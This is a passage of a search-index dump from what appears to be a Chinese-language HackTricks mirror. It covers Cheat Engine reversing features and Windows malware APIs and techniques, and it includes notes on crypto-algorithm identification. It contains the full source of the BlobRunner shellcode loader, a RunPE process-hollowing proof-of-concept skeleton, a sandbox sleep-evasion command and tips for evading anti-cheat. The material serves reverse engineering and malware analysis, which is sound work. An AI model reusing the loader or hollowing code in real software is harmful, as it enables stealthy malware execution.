”中删除原始代码,如果你不想让它被执行。在这个例子中,注入的代码将增加 2 分而不是减少 1: 点击执行等,你的代码应该被注入到程序中,改变功能的行为!","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 代码注入","id":"10020","title":"代码注入"},"10021":{"body":"自 7.0 版本以来,Cheat Engine 继续发展,增加了几个生活质量和 进攻性逆向 功能,这些功能在分析现代软件(不仅仅是游戏!)时非常方便。以下是一个 非常简明的实用指南 ,介绍你在红队/CTF 工作中最有可能使用的新增功能。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » Cheat Engine 7.x 的高级功能(2023-2025)","id":"10021","title":"Cheat Engine 7.x 的高级功能(2023-2025)"},"10022":{"body":"指针必须以特定偏移量结束,新的 偏差 滑块(≥7.4)在更新后重新扫描时大大减少了误报。将其与多映射比较(.PTR → 与其他保存的指针映射比较 )结合使用,可以在短短几分钟内获得 单一的弹性基指针 。 批量过滤快捷键:在第一次扫描后,按 Ctrl+A → 空格 标记所有内容,然后按 Ctrl+I(反转)以取消选择未通过重新扫描的地址。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 指针扫描器 2 改进","id":"10022","title":"指针扫描器 2 改进"},"10023":{"body":"*从 7.5 开始,旧的 Ultimap 在 Intel 处理器跟踪 (IPT) 的基础上重新实现。这意味着你现在可以记录目标采取的 每个 分支 而无需单步执行 (仅限用户模式,它不会触发大多数反调试小工具)。 Memory View → Tools → Ultimap 3 → check «Intel PT»\\nSelect number of buffers → Start 在几秒钟后停止捕获并 右键点击 → 将执行列表保存到文件 。结合分支地址和Find out what addresses this instruction accesses会话,可以极快地定位高频游戏逻辑热点。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » Ultimap 3 – Intel PT 跟踪","id":"10023","title":"Ultimap 3 – Intel PT 跟踪"},"10024":{"body":"版本7.5引入了一个 一字节 JMP 存根(0xEB),它安装了一个 SEH 处理程序并在原始位置放置了一个 INT3。当您在无法通过5字节相对跳转进行补丁的指令上使用 Auto Assembler → Template → Code Injection 时,它会自动生成。这使得在打包或大小受限的例程中实现“紧凑”钩子成为可能。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 1字节 jmp / 自动补丁模板","id":"10024","title":"1字节 jmp / 自动补丁模板"},"10025":{"body":"DBVM 是 CE 内置的 Type-2 虚拟机监控器。最近的构建终于添加了 AMD-V/SVM 支持 ,因此您可以在 Ryzen/EPYC 主机上运行Driver → Load DBVM。DBVM 允许您: 创建对 Ring-3/反调试检查不可见的硬件断点。 即使用户模式驱动程序被禁用,也可以读写可分页或受保护的内核内存区域。 执行无 VM-EXIT 的计时攻击绕过(例如,从虚拟机监控器查询rdtsc)。 提示: 当 Windows 11 上启用 HVCI/内存完整性时,DBVM 将拒绝加载 → 关闭它或启动一个专用的 VM 主机。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 使用 DBVM(AMD 和 Intel)进行内核级隐身","id":"10025","title":"使用 DBVM(AMD 和 Intel)进行内核级隐身"},"10026":{"body":"CE 现在提供了 ceserver 的完整重写,并可以通过 TCP 附加到 Linux、Android、macOS 和 iOS 目标。一个流行的分支集成了 Frida ,将动态插桩与 CE 的 GUI 结合起来 – 当您需要修补在手机上运行的 Unity 或 Unreal 游戏时,这非常理想: # on the target (arm64)\\n./ceserver_arm64 &\\n# on the analyst workstation\\nadb forward tcp:52736 tcp:52736 # (or ssh tunnel)\\nCheat Engine → \\"Network\\" icon → Host = localhost → Connect 对于 Frida 桥,请参见 bb33bb/frida-ceserver 在 GitHub 上。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 使用 ceserver 进行远程/跨平台调试","id":"10026","title":"使用 ceserver 进行远程/跨平台调试"},"10027":{"body":"Patch Scanner (MemView → Tools) – 检测可执行部分中意外的代码更改;对恶意软件分析很有用。 Structure Dissector 2 – 拖动地址 → Ctrl+D,然后 Guess fields 自动评估 C 结构。 .NET & Mono Dissector – 改进的 Unity 游戏支持;直接从 CE Lua 控制台调用方法。 Big-Endian 自定义类型 – 反向字节顺序扫描/编辑(对控制台模拟器和网络数据包缓冲区有用)。 Autosave & tabs 用于 AutoAssembler/Lua 窗口,以及 reassemble() 用于多行指令重写。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 其他值得注意的工具","id":"10027","title":"其他值得注意的工具"},"10028":{"body":"官方安装程序带有 InnoSetup 广告推荐 (RAV 等)。 始终点击 Decline 或从源代码编译 以避免 PUP。AV 仍会将 cheatengine.exe 标记为 HackTool ,这是预期的。 现代反作弊驱动程序(EAC/Battleye, ACE-BASE.sys, mhyprot2.sys)即使在重命名后也会检测 CE 的窗口类。请在 一次性虚拟机 内运行您的反向工程副本,或在禁用网络游戏后运行。 如果您只需要用户模式访问,请选择 Settings → Extra → Kernel mode debug = off 以避免加载可能在 Windows 11 24H2 Secure-Boot 上导致 BSOD 的 CE 未签名驱动程序。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 安装与 OPSEC 注意事项 (2024-2025)","id":"10028","title":"安装与 OPSEC 注意事项 (2024-2025)"},"10029":{"body":"Cheat Engine 7.5 release notes (GitHub) frida-ceserver cross-platform bridge Cheat Engine 教程,完成它以学习如何开始使用 Cheat Engine tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reversing Tools & Basic Methods » Cheat Engine » 参考文献","id":"10029","title":"参考文献"},"1003":{"body":"交易可以被可视化为图形,揭示基于资金流动的用户之间的潜在连接。","breadcrumbs":"Blockchain & Crypto » 交易图分析","id":"1003","title":"交易图分析"},"10030":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 从 原始代码 中唯一修改的行是第10行。为了编译它,只需 在Visual Studio Code中创建一个C/C++项目,复制并粘贴代码并构建它 。 c #include \\n#include \\n#include #ifdef _WIN64\\n#include \\n#endif // Define bool\\n#pragma warning(disable:4996)\\n#define true 1\\n#define false 0 const char* _version = \\"0.0.5\\"; const char* _banner = \\" __________.__ ___. __________\\\\n\\"\\n\\" \\\\\\\\______ \\\\\\\\ | ____\\\\\\\\_ |__\\\\\\\\______ \\\\\\\\__ __ ____ ____ ___________ \\\\n\\"\\n\\" | | _/ | / _ \\\\\\\\| __ \\\\\\\\| _/ | \\\\\\\\/ \\\\\\\\ / \\\\\\\\_/ __ \\\\\\\\_ __ \\\\\\\\ \\\\n\\"\\n\\" | | \\\\\\\\ |_( <_> ) \\\\\\\\_\\\\\\\\ \\\\\\\\ | \\\\\\\\ | / | \\\\\\\\ | \\\\\\\\ ___/| | \\\\\\\\/ \\\\n\\"\\n\\" |______ /____/\\\\\\\\____/|___ /____|_ /____/|___| /___| /\\\\\\\\___ >__| \\\\n\\"\\n\\" \\\\\\\\/ \\\\\\\\/ \\\\\\\\/ \\\\\\\\/ \\\\\\\\/ \\\\\\\\/ \\\\n\\\\n\\"\\n\\" %s \\\\n\\\\n\\"; void banner() {\\nsystem(\\"cls\\");\\nprintf(_banner, _version);\\nreturn;\\n} LPVOID process_file(char* inputfile_name, bool jit, int offset, bool debug) {\\nLPVOID lpvBase;\\nFILE* file;\\nunsigned long fileLen;\\nchar* buffer;\\nDWORD dummy; file = fopen(inputfile_name, \\"rb\\"); if (!file) {\\nprintf(\\" [!] Error: Unable to open %s\\\\n\\", inputfile_name); return (LPVOID)NULL;\\n} printf(\\" [*] Reading file...\\\\n\\");\\nfseek(file, 0, SEEK_END);\\nfileLen = ftell(file); //Get Length printf(\\" [*] File Size: 0x%04x\\\\n\\", fileLen);\\nfseek(file, 0, SEEK_SET); //Reset fileLen += 1; buffer = (char*)malloc(fileLen); //Create Buffer\\nfread(buffer, fileLen, 1, file);\\nfclose(file); printf(\\" [*] Allocating Memory...\\"); lpvBase = VirtualAlloc(NULL, fileLen, 0x3000, 0x40); printf(\\".Allocated!\\\\n\\");\\nprintf(\\" [*] |-Base: 0x%08x\\\\n\\", (int)(size_t)lpvBase);\\nprintf(\\" [*] Copying input data...\\\\n\\"); CopyMemory(lpvBase, buffer, fileLen);\\nreturn lpvBase;\\n} void execute(LPVOID base, int offset, bool nopause, bool jit, bool debug)\\n{\\nLPVOID shell_entry; #ifdef _WIN64\\nDWORD thread_id;\\nHANDLE thread_handle;\\nconst char msg[] = \\" [*] Navigate to the Thread Entry and set a breakpoint. Then press any key to resume the thread.\\\\n\\";\\n#else\\nconst char msg[] = \\" [*] Navigate to the EP and set a breakpoint. Then press any key to jump to the shellcode.\\\\n\\";\\n#endif shell_entry = (LPVOID)((UINT_PTR)base + offset); #ifdef _WIN64 printf(\\" [*] Creating Suspended Thread...\\\\n\\");\\nthread_handle = CreateThread(\\nNULL, // Attributes\\n0, // Stack size (Default)\\nshell_entry, // Thread EP\\nNULL, // Arguments\\n0x4, // Create Suspended\\n&thread_id); // Thread identifier if (thread_handle == NULL) {\\nprintf(\\" [!] Error Creating thread...\\");\\nreturn;\\n}\\nprintf(\\" [*] Created Thread: [%d]\\\\n\\", thread_id);\\nprintf(\\" [*] Thread Entry: 0x%016x\\\\n\\", (int)(size_t)shell_entry); #endif if (nopause == false) {\\nprintf(\\"%s\\", msg);\\ngetchar();\\n}\\nelse\\n{\\nif (jit == true) {\\n// Force an exception by making the first byte not executable.\\n// This will cause\\nDWORD oldp; printf(\\" [*] Removing EXECUTE access to trigger exception...\\\\n\\"); VirtualProtect(shell_entry, 1 , PAGE_READWRITE, &oldp);\\n}\\n} #ifdef _WIN64\\nprintf(\\" [*] Resuming Thread..\\\\n\\");\\nResumeThread(thread_handle);\\n#else\\nprintf(\\" [*] Entry: 0x%08x\\\\n\\", (int)(size_t)shell_entry);\\nprintf(\\" [*] Jumping to shellcode\\\\n\\");\\n__asm jmp shell_entry;\\n#endif\\n} void print_help() {\\nprintf(\\" [!] Error: No file!\\\\n\\\\n\\");\\nprintf(\\" Required args: \\\\n\\\\n\\");\\nprintf(\\" Optional Args:\\\\n\\");\\nprintf(\\" --offset The offset to jump into.\\\\n\\");\\nprintf(\\" --nopause Don\'t pause before jumping to shellcode. Danger!!! \\\\n\\");\\nprintf(\\" --jit Forces an exception by removing the EXECUTE permission from the alloacted memory.\\\\n\\");\\nprintf(\\" --debug Verbose logging.\\\\n\\");\\nprintf(\\" --version Print version and exit.\\\\n\\\\n\\");\\n} int main(int argc, char* argv[])\\n{\\nLPVOID base;\\nint i;\\nint offset = 0;\\nbool nopause = false;\\nbool debug = false;\\nbool jit = false;\\nchar* nptr; banner(); if (argc < 2) {\\nprint_help();\\nreturn -1;\\n} printf(\\" [*] Using file: %s \\\\n\\", argv[1]); for (i = 2; i < argc; i++) {\\nif (strcmp(argv[i], \\"--offset\\") == 0) {\\nprintf(\\" [*] Parsing offset...\\\\n\\");\\ni = i + 1;\\nif (strncmp(argv[i], \\"0x\\", 2) == 0) {\\noffset = strtol(argv[i], &nptr, 16);\\n}\\nelse {\\noffset = strtol(argv[i], &nptr, 10);\\n}\\n}\\nelse if (strcmp(argv[i], \\"--nopause\\") == 0) {\\nnopause = true;\\n}\\nelse if (strcmp(argv[i], \\"--jit\\") == 0) {\\njit = true;\\nnopause = true;\\n}\\nelse if (strcmp(argv[i], \\"--debug\\") == 0) {\\ndebug = true;\\n}\\nelse if (strcmp(argv[i], \\"--version\\") == 0) {\\nprintf(\\"Version: %s\\", _version);\\n}\\nelse {\\nprintf(\\"[!] Warning: Unknown arg: %s\\\\n\\", argv[i]);\\n}\\n} base = process_file(argv[1], jit, offset, debug);\\nif (base == NULL) {\\nprintf(\\" [!] Exiting...\\");\\nreturn -1;\\n}\\nprintf(\\" [*] Using offset: 0x%08x\\\\n\\", offset);\\nexecute(base, offset, nopause, jit, debug);\\nprintf(\\"Pausing - Press any key to quit.\\\\n\\");\\ngetchar();\\nreturn 0;\\n} tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reversing Tools & Basic Methods » Blobrunner","id":"10030","title":"Reversing Tools & Basic Methods"},"10031":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Common API used in Malware » 常见 API 在 Malware 中使用","id":"10031","title":"常见 API 在 Malware 中使用"},"10032":{"body":"","breadcrumbs":"Common API used in Malware » 通用","id":"10032","title":"通用"},"10033":{"body":"原始 Sockets WinAPI Sockets socket() WSAStratup() bind() bind() listen() listen() accept() accept() connect() connect() read()/recv() recv() write() send() shutdown() WSACleanup()","breadcrumbs":"Common API used in Malware » 网络","id":"10033","title":"网络"},"10034":{"body":"Many loaders wrap their TCP stream in SslStream 并将服务器的 leaf certificate 与嵌入的副本进行 pin(certificate pinning)。Bot info/tasks 会被压缩(例如,GZip)。当响应超过阈值(约 ~1 MB)时,数据会被分片为小块(例如 16 KB 段),以避免基于大小的启发式检测并减少反序列化期间的内存峰值。","breadcrumbs":"Common API used in Malware » TLS pinning and chunked transport","id":"10034","title":"TLS pinning and chunked transport"},"10035":{"body":"注册表 文件 服务 RegCreateKeyEx() GetTempPath() OpenSCManager RegOpenKeyEx() CopyFile() CreateService() RegSetValueEx() CreateFile() StartServiceCtrlDispatcher() RegDeleteKeyEx() WriteFile() RegGetValue() ReadFile()","breadcrumbs":"Common API used in Malware » 持久化","id":"10035","title":"持久化"},"10036":{"body":"名称 WinCrypt CryptAcquireContext() CryptGenKey() CryptDeriveKey() CryptDecrypt() CryptReleaseContext()","breadcrumbs":"Common API used in Malware » 加密","id":"10036","title":"加密"},"10037":{"body":"函数名 汇编指令 IsDebuggerPresent() CPUID() GetSystemInfo() IN() GlobalMemoryStatusEx() GetVersion() CreateToolhelp32Snapshot [Check if a process is running] CreateFileW/A [Check if a file exist]","breadcrumbs":"Common API used in Malware » 反分析/VM","id":"10037","title":"反分析/VM"},"10038":{"body":"Malware 经常通过搜索 Defender 的虚拟化导出(见 Malware Protection Emulator)来指纹化 sandbox emulators。如果检测到这些符号中的任何一个(对进程进行大小写不敏感的扫描),执行会被延迟 10–30 分钟并重新检查,以浪费分析时间。 作为检测用的 API 名称示例: MpVmp32Entry, MpVmp32FastEnter, MpCallPreEntryPointCode, MpCallPostEntryPointCode, MpFinalize, MpReportEvent*, MpSwitchToNextThread* VFS_* 系列:VFS_Open, VFS_Read, VFS_MapViewOfFile, VFS_UnmapViewOfFile, VFS_FindFirstFile/FindNextFile, VFS_CopyFile, VFS_DeleteFile, VFS_MoveFile ThrdMgr_*: ThrdMgr_GetCurrentThreadHandle, ThrdMgr_SaveTEB, ThrdMgr_SwitchThreads 典型的延迟原语(用户态): cmd cmd /c timeout /t %RANDOM_IN_[600,1800]% > nul Argument gatekeeping 操作员有时要求在运行 payload 之前存在一个看起来无害的 CLI 开关(例如 /i:--type=renderer 用于模拟 Chromium 子进程)。如果缺少该开关,loader 会立即退出,从而阻止简单的沙箱执行。","breadcrumbs":"Common API used in Malware » Emulator API fingerprinting & sleep evasion","id":"10038","title":"Emulator API fingerprinting & sleep evasion"},"10039":{"body":"Name VirtualAlloc 分配内存 (packers) VirtualProtect 更改内存权限 (packer giving execution permission to a section) ReadProcessMemory 注入到外部进程 WriteProcessMemoryA/W 注入到外部进程 NtWriteVirtualMemory CreateRemoteThread DLL/Process injection... NtUnmapViewOfSection QueueUserAPC CreateProcessInternalA/W","breadcrumbs":"Common API used in Malware » Stealth","id":"10039","title":"Stealth"},"1004":{"body":"该启发式基于分析具有多个输入和输出的交易,以猜测哪个输出是返回给发送者的找零。","breadcrumbs":"Blockchain & Crypto » 不必要输入启发式(最优找零启发式)","id":"1004","title":"不必要输入启发式(最优找零启发式)"},"10040":{"body":"Function Name CreateProcessA/W ShellExecute WinExec ResumeThread NtResumeThread","breadcrumbs":"Common API used in Malware » Execution","id":"10040","title":"Execution"},"10041":{"body":"GetAsyncKeyState() -- 按键记录 SetWindowsHookEx -- 按键记录 GetForeGroundWindow -- 获取运行窗口名称(或浏览器中的网站) LoadLibrary() -- 导入库 GetProcAddress() -- 导入库 CreateToolhelp32Snapshot() -- 列出运行中的进程 GetDC() -- 截图 BitBlt() -- 截图 InternetOpen(), InternetOpenUrl(), InternetReadFile(), InternetWriteFile() -- 访问互联网 FindResource(), LoadResource(), LockResource() -- 访问可执行文件的资源","breadcrumbs":"Common API used in Malware » Miscellaneous","id":"10041","title":"Miscellaneous"},"10042":{"body":"","breadcrumbs":"Common API used in Malware » Malware Techniques","id":"10042","title":"Malware Techniques"},"10043":{"body":"Execute an arbitrary DLL inside another process 定位要注入恶意 DLL 的进程:CreateToolhelp32Snapshot, Process32First, Process32Next 打开该进程:GetModuleHandle, GetProcAddress, OpenProcess 在进程内写入 DLL 路径:VirtualAllocEx, WriteProcessMemory 在进程中创建一个将加载恶意 DLL 的线程:CreateRemoteThread, LoadLibrary Other functions to use: NTCreateThreadEx, RtlCreateUserThread","breadcrumbs":"Common API used in Malware » DLL Injection","id":"10043","title":"DLL Injection"},"10044":{"body":"Load a malicious DLL without calling normal Windows API calls. The DLL is mapped inside a process, it will resolve the import addresses, fix the relocations and call the DllMain function.","breadcrumbs":"Common API used in Malware » Reflective DLL Injection","id":"10044","title":"Reflective DLL Injection"},"10045":{"body":"Find a thread from a process and make it load a malicious DLL 找到目标线程:CreateToolhelp32Snapshot, Thread32First, Thread32Next 打开线程:OpenThread 挂起线程:SuspendThread 在受害进程内写入恶意 DLL 的路径:VirtualAllocEx, WriteProcessMemory 恢复线程以加载库:ResumeThread","breadcrumbs":"Common API used in Malware » Thread Hijacking","id":"10045","title":"Thread Hijacking"},"10046":{"body":"Portable Execution Injection: 可执行文件将被写入受害进程内存并从那里执行。","breadcrumbs":"Common API used in Malware » PE Injection","id":"10046","title":"PE Injection"},"10047":{"body":"Process Hollowing is one of the favourite defence-evasion / execution tricks used by Windows malware. The idea is to launch a legitimate process in the suspended state, remove (hollow) its original image from memory and copy an arbitrary PE in its place. When the primary thread is finally resumed the malicious entry-point executes under the guise of a trusted binary (often signed by Microsoft). 典型工作流程: 启动一个良性宿主(例如 RegAsm.exe, rundll32.exe, msbuild.exe)并置于挂起状态,这样还不会执行任何指令。 c STARTUPINFOA si = { sizeof(si) };\\nPROCESS_INFORMATION pi;\\nCreateProcessA(\\"C:\\\\\\\\Windows\\\\\\\\Microsoft.NET\\\\\\\\Framework32\\\\\\\\v4.0.30319\\\\\\\\RegAsm.exe\\",\\nNULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi); 将恶意 payload 读取到内存并解析其 PE 头以获取 SizeOfImage、节和新的 EntryPoint。 NtUnmapViewOfSection / ZwUnmapViewOfSection – 解除挂起进程的原始映像基址映射。 VirtualAllocEx – 在远程进程内部为 SizeOfImage 保留 RWX 内存。 WriteProcessMemory – 先复制 Headers,然后遍历各节并复制它们的原始数据。 SetThreadContext – 修补上下文结构中 EAX/RAX(x64 为 RCX)或 Rip 的值,使 EIP 指向 payload 的 EntryPoint。 ResumeThread – 线程继续执行,运行攻击者提供的代码。 Minimal proof-of-concept (x86) skeleton: c void RunPE(LPCSTR host, LPVOID payload, DWORD payloadSize){\\n// 1. create suspended process\\nSTARTUPINFOA si = {sizeof(si)}; PROCESS_INFORMATION pi;\\nCreateProcessA(host, NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi); // 2. read remote PEB to get ImageBaseAddress\\nCONTEXT ctx; ctx.ContextFlags = CONTEXT_FULL;\\nGetThreadContext(pi.hThread,&ctx);\\nPVOID baseAddr;\\nReadProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL); // 3. unmap original image & allocate new region at same base\\nNtUnmapViewOfSection(pi.hProcess,baseAddr);\\nPVOID newBase = VirtualAllocEx(pi.hProcess,baseAddr,pHdr->OptionalHeader.SizeOfImage,\\nMEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\\n// 4-5. copy headers & sections …\\n// 6. write new image base into PEB and set Eip\\nWriteProcessMemory(pi.hProcess,(PVOID)(ctx.Ebx+8),&baseAddr,4,NULL);\\nctx.Eax = (DWORD)(newBase) + pHdr->OptionalHeader.AddressOfEntryPoint;\\nSetThreadContext(pi.hThread,&ctx);\\n// 7. run!\\nResumeThread(pi.hThread);\\n} 在 DarkCloud Stealer 活动中观察到的实用笔记: loader 选择 RegAsm.exe(属于 .NET Framework)作为宿主 —— 一个签名的二进制文件,不太可能引起注意。 解密后的 VB6 stealer (holographies.exe) 不会 被写入磁盘;它仅存在于 hollowed process 中,这使得静态检测更加困难。 敏感字符串(regexes、paths、Telegram credentials)对每个字符串使用 RC4 加密,并且仅在 runtime 时解密,进一步增加 memory scanning 的难度。 检测思路: 对那些创建后处于 CREATE_SUSPENDED 且在被分配为 RWX 内存区域之前从未创建 GUI/console 窗口的进程触发告警(良性代码很少这样)。 在不同进程之间寻找调用序列 NtUnmapViewOfSection ➜ VirtualAllocEx ➜ WriteProcessMemory。","breadcrumbs":"Common API used in Malware » Process Hollowing (a.k.a RunPE )","id":"10047","title":"Process Hollowing (a.k.a RunPE )"},"10048":{"body":"SSDT ( System Service Descriptor Table ) 指向内核函数 (ntoskrnl.exe) 或 GUI 驱动 (win32k.sys),因此用户进程可以调用这些函数。 rootkit 可能修改这些指针,使其指向攻击者可控的地址。 IRP ( I/O Request Packets ) 将数据片段从一个组件传递到另一个组件。内核中几乎所有东西都使用 IRPs,并且每个 device object 都有自己的函数表,可以被 hook:DKOM (Direct Kernel Object Manipulation) IAT ( Import Address Table ) 有助于解析依赖关系。可以 hook 该表以劫持将被调用的代码。 EAT ( Export Address Table ) Hooks。此类 hooks 可以在 userland 中完成。目标是 hook DLL 导出的函数。 Inline Hooks :这类较难实现。涉及修改函数本身的代码,例如在函数开头放置一个 jump。","breadcrumbs":"Common API used in Malware » Hooking","id":"10048","title":"Hooking"},"10049":{"body":"Unit42 – New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Common API used in Malware » References","id":"10049","title":"References"},"1005":{"body":"bash 2 btc --> 4 btc\\n3 btc 1 btc 如果添加更多输入使得变化输出大于任何单一输入,它可能会混淆启发式分析。","breadcrumbs":"Blockchain & Crypto » 示例","id":"1005","title":"示例"},"10050":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Word Macros » Word Macros","id":"10050","title":"Word Macros"},"10051":{"body":"很常见会发现 从未使用的垃圾代码 ,以使宏的逆向工程更加困难。 例如,在下图中可以看到,某个永远不会为真的条件被用来执行一些垃圾和无用的代码。","breadcrumbs":"Word Macros » 垃圾代码","id":"10051","title":"垃圾代码"},"10052":{"body":"使用 GetObject 函数可以从宏的表单中获取数据。这可以用来增加分析的难度。以下是一个宏表单的照片,用于 在文本框内隐藏数据 (一个文本框可以隐藏其他文本框): tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Word Macros » 宏表单","id":"10052","title":"宏表单"},"10053":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Cryptographic/Compression Algorithms » 加密/压缩算法","id":"10053","title":"加密/压缩算法"},"10054":{"body":"如果你在代码中 使用了右移和左移、异或以及多个算术操作 ,那么它很可能是 加密算法 的实现。这里将展示一些 识别所使用算法的方法,而无需逐步反向工程 。","breadcrumbs":"Cryptographic/Compression Algorithms » 识别算法","id":"10054","title":"识别算法"},"10055":{"body":"CryptDeriveKey 如果使用了此函数,可以通过检查第二个参数的值来找到 使用的算法 : 在这里查看可能的算法及其分配值的表格: https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id RtlCompressBuffer/RtlDecompressBuffer 压缩和解压缩给定的数据缓冲区。 CryptAcquireContext 来自 文档 : CryptAcquireContext 函数用于获取特定加密服务提供者(CSP)内特定密钥容器的句柄。 此返回的句柄用于调用使用所选CSP的CryptoAPI 函数。 CryptCreateHash 初始化数据流的哈希。如果使用了此函数,可以通过检查第二个参数的值来找到 使用的算法 : 在这里查看可能的算法及其分配值的表格: https://docs.microsoft.com/en-us/windows/win32/seccrypto/alg-id","breadcrumbs":"Cryptographic/Compression Algorithms » API 函数","id":"10055","title":"API 函数"},"10056":{"body":"有时,由于需要使用特殊且唯一的值,识别算法非常简单。 如果你在谷歌中搜索第一个常量,这就是你得到的结果: 因此,你可以假设反编译的函数是 sha256计算器 。 你可以搜索其他常量,可能会得到相同的结果。","breadcrumbs":"Cryptographic/Compression Algorithms » 代码常量","id":"10056","title":"代码常量"},"10057":{"body":"如果代码没有任何显著的常量,它可能在 从.data部分加载信息 。 你可以访问该数据, 分组第一个dword 并在谷歌中搜索,就像我们在前面的部分所做的那样: 在这种情况下,如果你搜索 0xA56363C6 ,你会发现它与 AES算法的表 相关。","breadcrumbs":"Cryptographic/Compression Algorithms » 数据信息","id":"10057","title":"数据信息"},"10058":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » RC4 (对称加密)","id":"10058","title":"RC4 (对称加密)"},"10059":{"body":"它由三个主要部分组成: 初始化阶段/ :创建一个 从0x00到0xFF的值表 (总共256字节,0x100)。这个表通常称为 替代盒 (或SBox)。 打乱阶段 :将 循环遍历之前创建的表 (0x100次迭代的循环),用 半随机 字节修改每个值。为了创建这些半随机字节,使用RC4 密钥 。RC4 密钥 的长度可以 在1到256字节之间 ,但通常建议长度超过5字节。通常,RC4密钥为16字节。 异或阶段 :最后,明文或密文与 之前创建的值进行异或 。加密和解密的函数是相同的。为此,将对创建的256字节进行循环,执行必要的次数。这通常在反编译的代码中通过**%256(模256)**来识别。 tip 为了在反汇编/反编译代码中识别RC4,你可以检查两个大小为0x100的循环(使用密钥),然后将输入数据与之前在两个循环中创建的256个值进行异或,可能使用%256(模256)","breadcrumbs":"Cryptographic/Compression Algorithms » 特点","id":"10059","title":"特点"},"1006":{"body":"攻击者可能会向之前使用过的地址发送少量资金,希望收款人将这些资金与未来交易中的其他输入结合,从而将地址链接在一起。","breadcrumbs":"Blockchain & Crypto » 强制地址重用","id":"1006","title":"强制地址重用"},"10060":{"body":"","breadcrumbs":"Cryptographic/Compression Algorithms » 初始化阶段/替代盒: (注意数字256作为计数器的使用,以及在256个字符的每个位置写入0的方式)","id":"10060","title":"初始化阶段/替代盒: 